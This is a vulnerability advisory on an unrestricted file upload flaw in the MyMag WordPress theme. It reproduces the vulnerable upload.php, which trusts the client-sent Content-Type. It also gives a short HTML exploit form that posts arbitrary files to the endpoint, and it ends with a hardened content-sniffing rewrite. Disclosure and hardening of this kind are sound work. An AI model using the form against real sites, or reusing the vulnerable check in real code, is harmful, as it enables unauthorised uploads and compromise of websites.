MyMag WordPress theme Unrestricted File Upload

2017.02.25
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

upload.php:

Code :

    $dir = "images/logos/";
    $url = $_POST['url'];
    if (is_writable($dir)) {
        // $_FILES["file"]["type"] is the Content-Type sent by the client in the
        // multipart request; it is not derived from the file's content.
        if ((($_FILES["file"]["type"] == "image/gif")
            || ($_FILES["file"]["type"] == "image/jpeg")
            || ($_FILES["file"]["type"] == "image/png")
            || ($_FILES["file"]["type"] == "image/pjpeg"))
            && ($_FILES["file"]["size"] < 1048576)) {
            if ($_FILES["file"]["error"] > 0) {
                echo "Return Code: " . $_FILES["file"]["error"] . "<br />";
            } else {
                $_FILES["file"]["name"] = str_replace(' ', '_', $_FILES["file"]["name"]);
                if (file_exists($dir . $_FILES["file"]["name"])) {
                    echo $_FILES["file"]["name"] . " already exists. ";
                } else {
                    // Extension is chosen from the client-supplied type
                    // ("image/pjpeg" has no case, so $end stays unset for it).
                    switch ($_FILES["file"]["type"]) {
                        case "image/jpeg": $end = ".jpg"; break;
                        case "image/png":  $end = ".png"; break;
                        case "image/gif":  $end = ".gif"; break;
                    }
                    $newname = time() . $end;
                    move_uploaded_file($_FILES["file"]["tmp_name"], $dir . $newname);
                    $file = $newname;
                    $admin = "/wp-admin/themes.php?page=functions.php&pic=";
                    header("Location: $url$admin$file");
                }
            }
        }
    }

Page : /wp-content/themes/mymag/upload.php

To exploit :

    <html>
    <body>
    <form action="http://localhost/wp-content/themes/mymag/upload.php" method="post" enctype="multipart/form-data">
    <label for="file">Filename:</label>
    <input type="file" name="file" id="file"><br>
    <input type="submit" name="submit" value="Submit">
    </form>
    </body>
    </html>

Upload the file to the form and submit the form. The file will be uploaded to http://localhost/wp-content/themes/mymag/images/logos
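A hardened counterpart to the upload step above, as an added example that is not part of the advisory or the theme's code: it picks the extension from the file's sniffed content rather than the request's Content-Type, and stores the file under a server-chosen name. The function names, constants and sample bytes are assumptions made for illustration, and authentication of the caller is assumed to happen before store_upload() is reached.

```php
<?php
// Added example (not the theme's code): decide the stored extension from the
// file's content instead of the client-supplied $_FILES["file"]["type"].

const MAX_BYTES = 1048576; // same size limit as the original script
const ALLOWED = ['image/jpeg' => '.jpg', 'image/png' => '.png', 'image/gif' => '.gif'];

// Returns the extension for an allowed image, or null if the content is rejected.
function image_extension_for(string $path): ?string
{
    if (!is_file($path) || filesize($path) >= MAX_BYTES) {
        return null;
    }
    // MIME type sniffed from the file's bytes by the fileinfo extension.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($path);
    return is_string($mime) ? (ALLOWED[$mime] ?? null) : null;
}

// Hypothetical replacement for the move step; $file is one $_FILES entry.
function store_upload(array $file, string $dir): ?string
{
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    $ext = image_extension_for($file['tmp_name']);
    if ($ext === null) {
        return null; // content is not one of the allowed image types
    }
    $name = bin2hex(random_bytes(16)) . $ext; // server-chosen, unpredictable name
    return move_uploaded_file($file['tmp_name'], $dir . $name) ? $name : null;
}

// Constructed samples for a command-line check: a script and a minimal GIF header.
if (PHP_SAPI === 'cli') {
    $samples = ['script' => "<?php echo 'x'; ?>\n", 'gif' => "GIF89a\x01\x00\x01\x00\x00\x00\x00;"];
    foreach ($samples as $label => $bytes) {
        $tmp = tempnam(sys_get_temp_dir(), 'up');
        file_put_contents($tmp, $bytes);
        var_dump($label, image_extension_for($tmp));
        unlink($tmp);
    }
}
```

Content sniffing does not prove a file is harmless, so the upload directory should also be configured so that the web server never executes scripts from it.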



Copyright 2024, cxsecurity.com

 
